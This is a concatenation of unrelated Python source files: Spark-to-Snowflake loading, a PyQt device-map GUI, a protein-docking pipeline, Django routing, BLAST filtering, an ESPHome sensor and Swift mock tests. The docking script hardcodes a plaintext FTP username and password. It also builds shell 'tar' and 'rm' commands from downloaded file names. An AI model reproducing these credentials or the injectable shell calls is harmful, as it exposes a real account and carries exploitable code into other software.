  "sfUrl": "https://op82353.east-us-2.azure.snowflakecomputing.com",
  "sfUser": sfUser,
  "sfPassword": sfPassword,
  "sfDatabase": "NORTHWOODS",
  "sfSchema": "POV_REPORTING",
  "sfWarehouse": "SF_TUTS_WH"
}
# COMMAND ----------
# Authenticate Spark to the ADLS Gen2 storage account with an account key.
spark.conf.set("fs.azure.account.key.northwoods40954fb03.dfs.core.windows.net", adls_key)
# COMMAND ----------
#Loading the Flights table
# Read the landed CSV (header row present) and overwrite the Snowflake table.
(spark.read
  .format("csv")
  .option("path","abfss://landing@northwoods40954fb03.dfs.core.windows.net/flights")
  .option("header",True)
  .load()
  .write
  .format("snowflake")
  .mode("overwrite")
  .options(**snowflake_options)
  .option("dbtable","flights")
  .save()
)
# COMMAND ----------
#Loading the Airline table
(spark.read
  .format("csv")
  .option("path","abfss://landing@northwoods40954fb03.dfs.core.windows.net/airlines")
  .option("header",True)
  .load()
  .write
  .format("snowflake")
  .mode("overwrite")
  .options(**snowflake_options)
  .option("dbtable","airlines")
  .save()
)
# COMMAND ----------
#Loading the airport table
(spark.read
  .format("csv")
  .option("path","abfss://landing@northwoods40954fb03.dfs.core.windows.net/airports")
  .option("header",True)
  .load()
  .write
  .format("snowflake")
  .mode("overwrite")
  .options(**snowflake_options)
  .option("dbtable","airports")
  .save()
)
|
#!/usr/bin/python
from PyQt4.QtCore import Qt, QAbstractTableModel, QVariant
from PyQt4.QtGui import QAction, QFrame, QLabel, QPalette, QStyle
from PyQt4.QtGui import QItemDelegate, QItemSelection, QItemSelectionModel, QSortFilterProxyModel, QTableView
from MeshDevice import MAP_SIZE
FONT_METRICS_CORRECTION = 1.3  # empirical widening factor applied to boundingRect widths
MAP_FIELD = 2  # margin, in map units, around the device map
MAP_TOTAL = MAP_SIZE + 2 * MAP_FIELD  # full map extent including both margins
INVALID_DATA = QVariant()  # Qt convention: an empty QVariant means "no data"
RAW_ROLE = Qt.UserRole  # custom role holding the unformatted field value
CHANGED_ROLE = Qt.UserRole + 1  # custom role flagging a value change since the last refresh
class Column(object):
    """Static description of one table column: metadata, formatting, headers."""
    def __init__(self, number, checked, changing, name, description, fieldName, longestValue = 100, fmt = None, formatter = None):
        self.number = number          # column index in the model
        self.checked = checked        # initially visible?
        self.changing = changing      # whether the field's value is expected to change
        self.name = name
        self.description = description
        self.fieldName = fieldName    # attribute name read from the device object
        self.fmt = fmt                # optional %-format string
        self.formatter = formatter    # optional callable applied before formatting
        # Pre-format the widest expected value; used for column sizing.
        self.longestValue = self.process(longestValue)
        self.headers = { # This really is a part of View, but moving it off here doesn't work well
            Qt.DisplayRole: name,
            Qt.ToolTipRole: description or name,
            Qt.StatusTipRole: description or name,
            Qt.TextAlignmentRole: Qt.AlignRight
        }
    def process(self, data):
        """Format *data* for display: formatter first, then fmt, else str()."""
        if data is None:
            return None
        if self.formatter:
            data = self.formatter(data)
        return self.fmt % data if self.fmt else str(data)
class ColumnAction(QAction):
    """Checkable menu action that shows/hides one table column."""
    def __init__(self, column, toggleCallback, menu):
        QAction.__init__(self, menu)
        self.setCheckable(True)
        self.setChecked(column.checked)
        self.setToolTip(column.description or column.name)
        self.setStatusTip(column.description or column.name)
        # Checked means "visible"; the callback apparently takes a "hidden"
        # flag, hence the negation -- TODO confirm against toggleCallback.
        toggle = lambda checked: toggleCallback(column.number, not checked)
        toggle(column.checked)  # apply the initial visibility immediately
        self.toggled.connect(toggle)
class Cell(dict):
    """Cached per-(device, column) model data, keyed by Qt item role.

    Falls back to the column's header data for roles not cached here.
    """
    def __init__(self, device, column):
        dict.__init__(self)
        self[CHANGED_ROLE] = None   # None until the first setData() call
        self[RAW_ROLE] = None       # last raw field value seen
        self[Qt.DisplayRole] = ''   # formatted text shown by the view
        self.device = device
        self.column = column
    def setData(self, initial = False):
        """Refresh the cache from the device, tracking whether the value changed."""
        data = getattr(self.device, self.column.fieldName)
        if data == self[RAW_ROLE]:
            self[CHANGED_ROLE] = False
        else:
            # The very first load is not considered a "change".
            self[CHANGED_ROLE] = not initial
            self[RAW_ROLE] = data
            self[Qt.DisplayRole] = self.column.process(data)
    def getData(self, role):
        """Return cached data for *role*, or the column's header default."""
        data = self.get(role)
        # FIX: use identity, not equality, to test for the None sentinel --
        # cached values may define their own (possibly surprising) __eq__.
        return data if data is not None else self.column.headers.get(role, INVALID_DATA)
class DevicesModel(QAbstractTableModel):
    """Table model backed by a fixed grid of Cell caches (devices x columns)."""
    def __init__(self, devices, columns, parent):
        QAbstractTableModel.__init__(self, parent)
        self.columns = columns
        # Immutable 2-D cache: one Cell per (device, column) pair.
        self.cache = tuple(tuple(Cell(device, column) for column in columns) for device in devices)
        self.numRows = len(devices)
        self.numColumns = len(columns)
        # Corner indexes reused by every dataChanged emission in refresh().
        self.minIndex = self.createIndex(0, 0)
        self.maxIndex = self.createIndex(self.numRows - 1, self.numColumns - 1)
    def rowCount(self, _parent = None):
        return self.numRows
    def columnCount(self, _parent = None):
        return self.numColumns
    def getDeviceSelection(self, nRow):
        """Return a selection spanning the whole row for device *nRow*."""
        return QItemSelection(self.index(nRow, 0), self.index(nRow, self.columnCount() - 1))
    def headerData(self, section, orientation, role = Qt.DisplayRole):
        """Column headers come from Column.headers; row headers are the row number."""
        try:
            return self.columns[section].headers[role] if orientation == Qt.Horizontal else section
        except LookupError: pass # ToDo: avoid exceptions
        except ValueError: pass
        return INVALID_DATA
    def data(self, index, role = Qt.DisplayRole):
        try:
            return self.cache[index.row()][index.column()].getData(role)
        except LookupError: pass
        except AttributeError: pass
        return INVALID_DATA
    def refresh(self, initial = False):
        """Re-read every device field into the cache and notify the views once."""
        for cacheRow in self.cache:
            for cell in cacheRow:
                cell.setData(initial)
        self.dataChanged.emit(self.minIndex, self.maxIndex)
class RoleDefaultSortProxyModel(QSortFilterProxyModel):
    """Sort proxy that compares a configurable role (e.g. RAW_ROLE, not display text)."""
    def __init__(self, sourceModel, role = Qt.DisplayRole, parent = None):
        QSortFilterProxyModel.__init__(self, parent)
        self.role = role
        self.setSourceModel(sourceModel)
        self.setDynamicSortFilter(True)
    def lessThan(self, left, right):
        """Compare by the configured role; fall back to row order for ties (stable sort)."""
        leftData = self.sourceModel().data(left, self.role)
        rightData = self.sourceModel().data(right, self.role)
        return leftData < rightData if leftData != rightData else left.row() < right.row()
class DevicesTableDelegate(QItemDelegate): # QStyledItemDelegate doesn't handle selection background color properly
    """Delegate that paints changed cells with an 'active' palette and hides the focus rect."""
    def __init__(self, inactivePalette, activePalette, parent):
        QItemDelegate.__init__(self, parent)
        self.inactivePalette = inactivePalette
        self.activePalette = activePalette
    def paint(self, paint, option, index):
        # CHANGED_ROLE drives the highlight: changed values use the active palette.
        option.palette = self.activePalette if index.data(CHANGED_ROLE).toBool() else self.inactivePalette
        QItemDelegate.paint(self, paint, option, index)
    def drawFocus(self, painter, option, rect):
        # Suppress the dotted focus rectangle entirely.
        option.state &= ~QStyle.State_HasFocus
        QItemDelegate.drawFocus(self, painter, option, rect)
class DevicesTableView(QTableView):
    """Table view of devices, kept in sync with the map frame's selection."""
    def configure(self, devicesModel, devicesMapFrame, changedDataSample):
        """Wire up model, palettes and sizing; *changedDataSample* supplies the 'changed' color."""
        self.devicesMapFrame = devicesMapFrame
        # Sort on raw values rather than on formatted display text.
        self.setModel(RoleDefaultSortProxyModel(devicesModel, RAW_ROLE))
        self.columnWidths = tuple(self.fontMetrics().boundingRect(column.longestValue).width() * FONT_METRICS_CORRECTION for column in devicesModel.columns)
        #for column in devicesModel.columns: # ToDo: Works for width but not for height, find current row height?
        #    column.headers[Qt.SizeHintRole] = QSize(self.fontMetrics().boundingRect(column.longestValue).size().width(), self.rowHeight(0))
        # Selected-but-unchanged text keeps the normal text color.
        inactivePalette = self.palette()
        inactivePalette.setColor(QPalette.HighlightedText, inactivePalette.color(QPalette.Text))
        activePalette = QPalette(inactivePalette)
        activeColor = changedDataSample.palette().color(QPalette.WindowText)
        activePalette.setColor(QPalette.Text, activeColor)
        activePalette.setColor(QPalette.HighlightedText, activeColor)
        self.setItemDelegate(DevicesTableDelegate(inactivePalette, activePalette, self))
        self.resizeRowsToContents()
        self.resizeColumnsToContents()
        self.horizontalHeader().setHighlightSections(False)
    def sizeHintForColumn(self, nColumn):
        return self.columnWidths[nColumn] # ToDo: move it column.configure
    def selectionChanged(self, selected, deselected):
        """Mirror row (de)selection onto the map frame; column 0 stands in for the whole row."""
        QTableView.selectionChanged(self, selected, deselected)
        for row in (self.model().mapToSource(index).row() for index in deselected.indexes() if index.column() == 0):
            self.devicesMapFrame.deactivate(row)
        for row in (self.model().mapToSource(index).row() for index in selected.indexes() if index.column() == 0):
            self.devicesMapFrame.activate(row)
    def selectDevice(self, selection, active = True):
        """Select or deselect a source-model row selection through the sort proxy."""
        self.selectionModel().select(self.model().mapSelectionFromSource(selection), QItemSelectionModel.Select if active else QItemSelectionModel.Deselect)
class DeviceVisual(QLabel):
    """Label on the map representing one device; styled by its watched state."""
    def __init__(self, device, viewSelection, activeSample, inactiveSample, mapFrame):
        # Label text: first character of the sample text plus the device number.
        QLabel.__init__(self, inactiveSample.text()[0] + str(device.number), mapFrame)
        self.device = device
        self.viewSelection = viewSelection   # table-row selection for this device
        self.callback = mapFrame.mouseClicked
        self.activeStyleSheet = activeSample.styleSheet()
        self.inactiveStyleSheet = inactiveSample.styleSheet()
        self.deactivate()  # start unwatched/unstyled
    def activate(self, active = True):
        """Set the device's watched flag and the matching style sheet."""
        self.device.setWatched(active)
        self.setStyleSheet(self.activeStyleSheet if active else self.inactiveStyleSheet)
    def deactivate(self, inactive = True):
        self.activate(not inactive)
    def isActive(self):
        return self.device.watched
    def toggle(self):
        self.activate(not self.device.watched)
    def mousePressEvent(self, event):
        # Delegate click handling (with keyboard modifiers) to the map frame.
        self.callback(self, event.modifiers())
class DevicesMapFrame(QFrame):
    """Square frame showing device positions; kept in sync with the table selection."""
    def configure(self, devices, deviceDistance, getSelection, selectDevice, activeDeviceVisualSample, inactiveDeviceVisualSample):
        self.deviceDistance = deviceDistance   # callable: distance between two devices
        self.selectDevice = selectDevice       # callable into the table view
        # Half the glyph size, used to center each label on its coordinates.
        offsetSize = self.fontMetrics().boundingRect(inactiveDeviceVisualSample.text()[0])
        self.offset = tuple(float(x) / 2 for x in (offsetSize.width() * FONT_METRICS_CORRECTION, offsetSize.height()))
        self.deviceVisuals = tuple(DeviceVisual(device, getSelection(device.number), activeDeviceVisualSample, inactiveDeviceVisualSample, self) for device in devices)
        self.oldWindowSize = None
        self.recalculate(self.width())
    def afterShow(self): # must be performed after show()
        for deviceVisual in self.deviceVisuals:
            deviceVisual.deactivate()
    def resizeEvent(self, _event = None):
        # Keep the frame square: recalculate when already square, else shrink
        # the longer side to match the shorter one (which re-triggers this event).
        (width, height) = (self.width(), self.height())
        size = min(width, height)
        if width == height:
            if size != self.oldSize:
                self.recalculate(size)
            return
        # if width > height: # Trying to fit the window to the contents, works bad on Windows
        #     (windowWidth, windowHeight) = (self.mesh.width(), self.mesh.height())
        #     if (windowWidth, windowHeight) != self.oldWindowSize:
        #         self.oldWindowSize = (windowWidth, windowHeight)
        #         self.mesh.resize(windowWidth - (width - size), windowHeight)
        #         return
        self.resize(size, size)
    def recalculate(self, size):
        """Recompute pixels-per-unit and margin for the new frame size."""
        self.oldSize = size
        self.ppu = float(size) / MAP_TOTAL
        self.field = MAP_FIELD * self.ppu
        self.refresh()
    def refresh(self):
        # Position each label at its scaled device coordinates, centered by self.offset.
        for deviceVisual in self.deviceVisuals:
            deviceVisual.move(*(int(round(c * self.ppu + self.field - offset)) for (c, offset) in zip((deviceVisual.device.x, deviceVisual.device.y), self.offset)))
    def mouseClicked(self, deviceVisual, modifiers):
        """Click: exclusive select; Ctrl: toggle; Shift: select plus all in-range devices."""
        if modifiers == Qt.NoModifier:
            for otherVisual in self.deviceVisuals:
                self.selectDevice(otherVisual.viewSelection, False)
            self.selectDevice(deviceVisual.viewSelection)
        elif modifiers == Qt.ControlModifier:
            self.selectDevice(deviceVisual.viewSelection, not deviceVisual.isActive())
        elif modifiers == Qt.ShiftModifier:
            self.selectDevice(deviceVisual.viewSelection)
            # Select every inactive device that lies within each active
            # device's radius (max distance to any other active device).
            activeVisuals = tuple(v for v in self.deviceVisuals if v.isActive())
            activeVisualsAndRanges = tuple((av, max(self.deviceDistance(av.device, ov.device) for ov in activeVisuals if ov is not av)) for av in activeVisuals)
            for iav in (v for v in self.deviceVisuals if not v.isActive()):
                self.selectDevice(iav.viewSelection, all(self.deviceDistance(iav.device, av.device) <= radius for (av, radius) in activeVisualsAndRanges))
    def activate(self, number, active = True):
        self.deviceVisuals[number].activate(active)
    def deactivate(self, number, inactive = True):
        self.activate(number, not inactive)
|
#!/usr/bin/env python
from FileTransfer import FtpFileTransfer
import os
import subprocess
import prody
class _main_():
    """Script-style namespace driving the CELPP docking pipeline.

    NOTE(review): the methods take no ``self`` and are invoked at class-body
    execution time (``fetchData()`` / ``align()`` at the bottom), so merely
    importing this module runs the whole pipeline as a side effect.
    """
    def fetchData():
        """Download and unpack the weekly challenge data from ftp.box.com."""
        global wd
        wd = str(os.getcwd())
        print('All Files will go into the celpp folder')
        cred = (wd + '/credentials.txt')
        try: #attempts to connect to file required to connect to ftp
            print('Trying to open credentials.txt')
            fo = open(cred, 'r')
            fo.close()
        except: #writes file required to connect to ftp if not already made
            # NOTE(review): plaintext credentials are written to disk here --
            # they should come from a secrets store, not source code.
            print('Writing credentials.txt file')
            fo = open(cred, 'w')
            fo.write('host ftp.box.com\nuser nlr23@pitt.edu\npass #hail2pitt1\npath\ncontestantid 33824\nchallengepath /challengedata\nsubmissionpath /33824')
            fo.close()
        if(os.path.isdir(wd + '/challengedata')==False):#creates challengedata folder if it doesn't exist
            os.mkdir(wd + '/challengedata')
            os.chdir(wd + '/challengedata')
        else: #changes to challengedata folder if it exists
            os.chdir(wd + '/challengedata')
        ftp = FtpFileTransfer(cred)
        print('Connecting to ftp.box.com')
        ftp.connect()
        print('Connected to ftp')
        ftp_files = ftp.list_files('challengedata')#creates list of files from box
        count = 0 #keep track number of files added to local folder
        for x in (ftp_files):
            split = os.path.splitext(x)
            dir = os.path.splitext(split[0])
            if(str(split[1]) == '.gz'):
                if os.path.isfile(x) == True:#if it finds the zip file in local folder, unzips and deletes zippped file
                    print('Unzipping folder ' + str(dir[0]))
                    os.system('tar -xzf ' + x)
                    print('Deleting zip file: ' + x)
                    os.system('rm ' + x)
                elif os.path.isdir(str(dir[0])) == True:#if it finds the unzipped directory in local folders
                    pass
                else: #if it can't find the week in any format; downloads, unzips, and removes zipped file
                    ftp.download_file('challengedata/'+ x, wd + '/challengedata/' + x)
                    print('Unzipping folder ' + str(dir[0]))
                    os.system('tar -xzf ' + x)
                    print('Deleting zip file: ' + x)
                    os.system('rm ' + x)
                    count = count + 1
                    print(str(dir[0]) + ' was just added to the challengedata folder')
            else:
                ftp.download_file('challengedata/'+ x, wd + '/challengedata/' + x)
        print('challengedata has been updated. ' + str(count) + ' week(s) was/were just added.')
        print('Disconnecting from ftp')
        ftp.disconnect()
    def align():
        """Prepare receptor/ligand files and run smina docking for each week."""
        global wd
        ans = wd +'/challengedata/answers'
        if os.path.isdir(ans)==False: #if the answers directory isnt formed make it
            os.mkdir(wd+'/challengedata/answers')
        rddir = wd+'/challengedata/rdkit-scripts'
        if os.path.isdir(rddir)==False:
            a='git clone https://github.com/dkoes/rdkit-scripts'
            os.system(a)
        data = os.listdir(wd+'/challengedata')
        for x in (data):#for each weeks data
            if x=="readme.txt" or x=="latest.txt" or x=="answers" or x=="rdkit-scripts" or x=='PDBfiles' or x=='visual.txt':
                pass
            else:
                toDir = wd +'/challengedata/answers/' + x
                if os.path.isdir(toDir)==False: #if the path to answers dir doesnt exist
                    os.mkdir(toDir) #make directory
                dock=os.listdir(wd+'/challengedata/'+x)
                for y in (dock):
                    a = str(os.getcwd()+'/answers/'+x+'/'+y+'/lmcss_docked.sdf')
                    if y=='readme.txt' or y=='new_release_structure_sequence_canonical.tsv' or y == 'new_release_structure_nonpolymer.tsv' or y=='new_release_crystallization_pH.tsv' or y=='new_release_structure_sequence.tsv':
                        pass
                    elif(os.path.isfile(a)==True):
                        pass
                    else:
                        # Extract the receptor's ATOM records into lmcss_rec.pdb.
                        input = os.listdir(wd+'/challengedata/'+x+'/'+y)
                        for z in (input):
                            if z.startswith("LMCSS") and z.endswith(".pdb"):
                                if(z.endswith("lig.pdb")):
                                    pass
                                else:
                                    sts = str("grep ATOM "+ z+" > lmcss_rec.pdb")
                                    cd = wd+'/challengedata'
                                    os.chdir(cd+'/'+x+'/'+y)
                                    os.system(sts)
                                    os.chdir(cd)
                        # Generate a 3-D conformer of the ligand SMILES.
                        input = os.listdir(cd+'/'+x+'/'+y)
                        for z in (input):
                            if z.endswith(".smi"):
                                cd = str(os.getcwd())
                                sts = str(" "+cd+'/'+x+'/'+y+'/'+z +" lig.sdf --maxconfs 1")
                                os.chdir(cd+'/'+x+'/'+y)
                                os.system(cd+'/rdkit-scripts/rdconf.py'+ sts)
                                os.chdir(cd)
                        # Dock with smina, autoboxed around the reference ligand.
                        input = os.listdir(cd+'/'+x+'/'+y)
                        for z in (input):
                            if z.endswith("lig.pdb"):
                                sts=str("smina -r lmcss_rec.pdb -l lig.sdf --autobox_ligand "+z+" -o lmcss_docked.sdf")
                                cd=str(os.getcwd())
                                os.chdir(cd+'/'+x+'/'+y)
                                os.system(sts)
                                os.chdir(cd)
                        cur = str(os.getcwd()+'/answers/'+x+'/'+y)
                        if (os.path.isdir(cur)==True):
                            os.chdir(cd+'/'+x+'/'+y)
                            input = os.listdir(cd+'/'+x+'/'+y)
                            for i in (input):
                                if i.endswith("lig.pdb"):
                                    #see if pdb exists
                                    protein = prody.fetchPDB(y)
                                    f =open('sdsorted.txt','ab+')
                                    bind =subprocess.check_output('sdsorter lmcss_docked.sdf -print', shell=True)
                                    f.write(bind)
                                    f.close()
                                    k=open('sdsorted.txt')
                                    lines = k.readlines()
                                    bind=lines[1].strip('1 ')
                                    bind =bind.split(" ",1)
                                    print(bind[0])
                                    k.close()
                                    sts=str("obrms -f "+i+" lmcss_docked.sdf")
                                    f=open('rmsd.txt', 'ab+')
                                    rm =subprocess.check_output(sts, shell=True)
                                    f.write(rm)
                                    f.close()
                                    j=open('rmsd.txt')
                                    lines=j.readlines()
                                    top=lines[1].strip('RMSD : ')
                                    top=top.replace('\n','')
                                    j.close()
                                    print(top)  # FIX: was Python-2 `print top` (SyntaxError on Python 3)
                                    #run obrms
                                    # parse results and output to the visualization txt file
                                    #os.system(sts)
                                    f=open('visual.txt', 'ab+')
                                    f.write(x+' smina '+y+' '+top+' '+bind[0]+'\n')
                                    f.close()  # FIX: was `f.close` (bare attribute access -- file was never closed)
                                    os.chdir(wd+'/challengedata/')
                                    print(x+' '+y)
                                    break
                            os.chdir(wd)
                        else:
                            os.mkdir(cur)
                            os.chdir(cd+'/'+x+'/'+y)
                            input = os.listdir(cd+'/'+x+'/'+y)
                            for i in (input):
                                if i.endswith("lig.pdb"):
                                    protein = prody.fetchPDB(y)
                                    f=open('sdsorted.txt','ab+')
                                    bind =subprocess.check_output('sdsorter lmcss_docked.sdf -print', shell=True)
                                    f.write(bind)
                                    f.close()
                                    k=open('sdsorted.txt')
                                    lines = k.readlines()
                                    bind=lines[1].strip('1 ')
                                    bind =bind.split(" ",1)
                                    print(bind[0])
                                    k.close()
                                    sts=str("obrms -f "+i+" lmcss_docked.sdf")
                                    f=open('rmsd.txt', 'ab+')
                                    rm =subprocess.check_output(sts, shell=True)
                                    f.write(rm)
                                    f.close()
                                    j=open('rmsd.txt')
                                    lines=j.readlines()
                                    top=lines[1].strip('RMSD : ')
                                    top=top.replace('\n','')
                                    print(top)  # FIX: was Python-2 `print top`
                                    j.close()
                                    #os.system(sts)
                                    f=open('visual.txt', 'ab+')
                                    f.write(x+' smina '+y+' '+top+' '+bind[0]+'\n')
                                    f.close()
                                    os.chdir(wd+'/challengedata/')
                                    print(x+' '+y)
                                    break
                            os.chdir(wd)
    def compare():
        """Download reference PDB structures for each non-celpp week folder."""
        ###get PDB files from databank that are associated with each protein for later use
        ##change directory
        #create a folder that contains all pdb files from the PDB if it does not exist
        prody.pathPDBFolder(wd + '/challengedata/PDBfiles')
        #list of proteins that need to be downloaded
        weeks = []
        for(_, dirnames, _) in os.walk(wd + '/challengedata'):
            # NOTE(review): `dirnames` is a *list*, so these string
            # comparisons are always False -- confirm intent.
            if (dirnames=='latest.txt' or dirnames=='answers' or dirnames =='rdkit-scripts'):
                pass
            elif (dirnames not in weeks):
                weeks.extend(dirnames)
        proteins = [x for x in weeks if 'celpp' not in x]
        #download pdb using prody
        for x in proteins:
            if x=='rdkit-scripts' or x=='PDBfiles' or x=='answers':
                pass
            else:
                protein = prody.fetchPDB(x)
        #prody.superpose()
    def uploadData():#uploads zip files containing docking predictions to contestant folder specified in credentials.txt
        """Upload new files under ./protocols to the contestant's box folder."""
        print('Uploading files to box contestant folder')
        cred = wd + '/credentials.txt'
        ftp = FtpFileTransfer(cred)
        print('Connecting to ftp.box.com')
        ftp.connect()
        print('Connected to ftp')
        ftp_files = ftp.list_files(ftp.get_contestant_id())#creates list of files from box
        d = []
        for(_, dirnames, _) in os.walk(wd + '/protocols'):
            d.extend(dirnames)
            break
        for dir in (d):#NOT A FAN OF THE NESTED FOR LOOPS, WILL TRY TO FIND BETTER WAY TO IMPLEMENT THIS
            for(_,_,filenames) in os.walk(wd + '/protocols/' + dir):
                f = []
                f.extend(filenames)
                print('Uploading files for ' + dir)
                for x in (f):
                    if((x in ftp_files) == False):
                        file = wd + '/protocols/' + dir + '/' + x
                        remote_dir = ftp.get_remote_submission_dir()
                        remote_file_name = os.path.basename(file)
                        ftp.upload_file_direct(file, remote_dir, remote_file_name)
                    else:
                        pass
        print('All the files have been uploaded. Disconnecting from ftp')
        ftp.disconnect()
    # Pipeline runs when the class body executes (i.e. at import time).
    fetchData()
    align()
    #uploadData()
|
from django.urls import path, include
from rest_framework import routers
import shop.views
# DRF router auto-generates list/detail URL patterns for each registered ViewSet.
router = routers.DefaultRouter()
router.register('categories', shop.views.CategoryViewSet)
# basename is given explicitly here -- presumably ItemViewSet has no default
# queryset for DRF to infer it from; confirm against shop.views.
router.register('items', shop.views.ItemViewSet,basename='Item')
urlpatterns = [
    path('', include(router.urls)),
]
|
#!/usr/bin/env python
#-*- coding: UTF-8 -*_
import os
import pandas as pd
import sys
from Bio import SeqIO
from subprocess import Popen, PIPE
def Parser(folder):
    """Rewrite every GenBank file in *folder* as a single protein FASTA file.

    Each CDS feature is appended to ``file_parseado`` in the current working
    directory as ``> locus_tag@record_name`` followed by its translation.
    On any parsing failure, prints "Incorrect format" and exits.
    """
    directory = os.getcwd()
    try:
        # Start from a clean output file on every run.
        if os.path.isfile("file_parseado"):
            os.remove("file_parseado")
        output_handle = open("file_parseado", "a")
        os.chdir(folder)
        # FIX: removed a stray `os.listdir()` call whose result was discarded.
        for file in os.listdir():
            with open(file, "r") as input_handle:
                for seq_record in SeqIO.parse(input_handle, "genbank"):
                    for seq_feature in seq_record.features:
                        # FIX: narrowed the bare except to KeyError so only
                        # CDS features missing locus_tag/translation
                        # qualifiers are skipped, not arbitrary errors.
                        try:
                            if seq_feature.type == 'CDS':
                                #Select the outputs for the file
                                output_handle.write("> %s@%s\n%s\n" % (
                                    seq_feature.qualifiers['locus_tag'][0],
                                    seq_record.name,
                                    seq_feature.qualifiers['translation'][0]))
                        except KeyError:
                            pass
            # `with` closes input_handle; the explicit close was redundant.
    except Exception:
        print("Incorrect format")
        sys.exit()
    output_handle.close()
    print("Done!")
    os.chdir(directory)
def BlastP(file_query, file_parseado):
    """Run blastp of every sequence in *file_query* (FASTA) against *file_parseado*.

    Writes one ``<record.id>_result.tsv`` per query sequence, containing a
    fixed header line plus blastp outfmt-6 columns.
    """
    with open(file_query, "r") as query:
        for record in SeqIO.parse(query, "fasta"):
            # Write the single query sequence to a temp FASTA so blastp can
            # be invoked per record.
            seq = str(">%s\n%s" % (record.id, record.seq))
            temp = open(record.id + "temp.faa", "w")
            temp.write(seq)
            temp.close()
            # Call the function blast
            with open(record.id + "_result.tsv", "w") as res_blast:
                # NOTE(review): reading stdout directly while stderr is also
                # PIPEd can deadlock if blastp writes a lot to stderr --
                # consider process.communicate().
                process = Popen(['blastp', '-query', record.id + "temp.faa", '-subject',
                                 file_parseado, '-evalue', '0.00001', '-outfmt',
                                 "6 qseqid qcovs pident evalue sseqid sseq"], stdout=PIPE, stderr=PIPE)
                header = str("query_ID\tCoverage\tIdentity\tEvalue\tSubject_ID\tSubject_seq\n")
                result = process.stdout.read().decode("utf-8")
                res_blast.write(header)
                res_blast.write(result)
                res_blast.close()
            os.remove(record.id + "temp.faa")
    print("Blastp is done")
def Values(file_query):
    """Filter each per-query blastp result table by coverage and identity.

    Thresholds come from sys.argv[3] (coverage, default 50) and sys.argv[4]
    (identity, default 30); filtered rows go to ``<record.id>_filter.tsv``.
    """
    # Control the value of coverage
    try:
        if int(sys.argv[3]) >= 100:
            # NOTE(review): this rejects exactly 100 even though the message
            # says 0-100 is allowed -- confirm the intended boundary.
            print("Error: coverage has to be in between 0 and 100. Try again.")
            sys.exit()
        elif int(sys.argv[3]) >= 0 or int(sys.argv[3]) <= 100:
            # NOTE(review): this condition is always true ('or' was probably
            # meant to be 'and'), so any value below 100 is accepted.
            print("This coverage is OK.")
            value_cover = sys.argv[3]
            pass
    except:
        # Missing/non-numeric argv falls back to the default threshold.
        # NOTE(review): the bare except also swallows the SystemExit raised
        # above, so the "Try again" path never actually exits.
        value_cover = 50
    # Control de value of identity
    try:
        if int(sys.argv[4]) >= 100:
            print("Error: identity has to be in between 0 and 100. Try again.")
            sys.exit()
        elif int(sys.argv[4]) >= 0 or int(sys.argv[4]) <= 100:
            print("This identity is OK.")
            value_identity = sys.argv[4]
            pass
    except:
        value_identity = 30
    # Filtration
    for record in SeqIO.parse(file_query, "fasta"):
        with open(record.id + "_result.tsv") as tsvfile, \
             open(record.id + "_filter.tsv", "w") as tsv_filter:
            tsvreader = pd.read_csv(tsvfile, delimiter='\t')
            # Keep rows meeting both thresholds; column names match the
            # header written by BlastP().
            trying = tsvreader.loc[(tsvreader['Identity'] >= int(value_identity))
                                   & (tsvreader['Coverage'] >= int(value_cover)), :]
            trying.to_csv(tsv_filter, sep='\t')
            tsvfile.close()
            tsv_filter.close()
    print("The filtration is done correctly")
import esphome.codegen as cg
import esphome.config_validation as cv
from esphome.components import text_sensor
from esphome.const import CONF_ID
from . import EmptySensorHub, CONF_HUB_ID
DEPENDENCIES = ['empty_sensor_hub']  # require the hub component in the YAML config
text_sensor_ns = cg.esphome_ns.namespace('text_sensor')
TextSensor = text_sensor_ns.class_('TextSensor', text_sensor.TextSensor, cg.Nameable)
# Schema: a standard text_sensor entry plus a reference back to the hub instance.
CONFIG_SCHEMA = text_sensor.TEXT_SENSOR_SCHEMA.extend({
    cv.GenerateID(): cv.declare_id(TextSensor),
    cv.GenerateID(CONF_HUB_ID): cv.use_id(EmptySensorHub)
}).extend(cv.COMPONENT_SCHEMA)
def to_code(config):
    """ESPHome codegen coroutine: create the sensor and register it with its hub."""
    paren = yield cg.get_variable(config[CONF_HUB_ID])
    var = cg.new_Pvariable(config[CONF_ID])
    yield text_sensor.register_text_sensor(var, config)
    cg.add(paren.register_text_sensor(var))
def get_sum(a, b):
    """Return the sum of all integers between a and b inclusive, in either order."""
    if a > b:
        a, b = b, a
    # Closed-form arithmetic series: O(1), and removes the Python-2-only
    # xrange() call that raised NameError on Python 3.
    return (a + b) * (b - a + 1) // 2
|
from __future__ import absolute_import, division, unicode_literals
from json import loads, dumps
from twisted.trial.unittest import SynchronousTestCase
from twisted.internet.task import Clock
import treq
from mimic.rest.swift_api import SwiftMock
from mimic.resource import MimicRoot
from mimic.core import MimicCore
from mimic.rest.swift_api import normal_tenant_id_to_crazy_mosso_id
from mimic.test.helpers import request
class SwiftTests(SynchronousTestCase):
    """
    tests for swift API
    """
    def createSwiftService(self, rackspace_flavor=True):
        """
        Set up to create the requests
        """
        self.core = MimicCore(Clock(), [SwiftMock(rackspace_flavor)])
        self.root = MimicRoot(self.core).app.resource()
        # Authenticate once; the resulting catalog body is reused by tests.
        self.response = request(
            self, self.root, b"POST", b"/identity/v2.0/tokens",
            dumps({
                "auth": {
                    "passwordCredentials": {
                        "username": "test1",
                        "password": "test1password",
                    },
                    # TODO: should this really be 'tenantId'?
                    "tenantName": "fun_tenant",
                }
            }).encode("utf-8")
        )
        self.auth_response = self.successResultOf(self.response)
        text_body = self.successResultOf(treq.content(self.auth_response)).decode("utf-8")
        self.json_body = loads(text_body)
    def test_service_catalog(self):
        """
        When provided with a :obj:`SwiftMock`, :obj:`MimicCore` yields a
        service catalog containing a swift endpoint.
        """
        self.createSwiftService()
        self.assertEqual(self.auth_response.code, 200)
        self.assertTrue(self.json_body)
        sample_entry = self.json_body['access']['serviceCatalog'][0]
        self.assertEqual(sample_entry['type'], u'object-store')
        sample_endpoint = sample_entry['endpoints'][0]
        self.assertEqual(
            sample_endpoint['tenantId'],
            normal_tenant_id_to_crazy_mosso_id("fun_tenant")
        )
        self.assertEqual(sample_endpoint['region'], 'ORD')
        self.assertEqual(len(self.json_body['access']['serviceCatalog']), 1)
    def create_one_container(self, expected_code):
        """
        Create one container and assert its code is the given expected status.
        """
        uri = (self.json_body['access']['serviceCatalog'][0]['endpoints'][0]
               ['publicURL'] + '/testcontainer').encode("ascii")
        create_container = request(self, self.root, b"PUT", uri)
        create_container_response = self.successResultOf(create_container)
        self.assertEqual(create_container_response.code, expected_code)
        self.assertEqual(
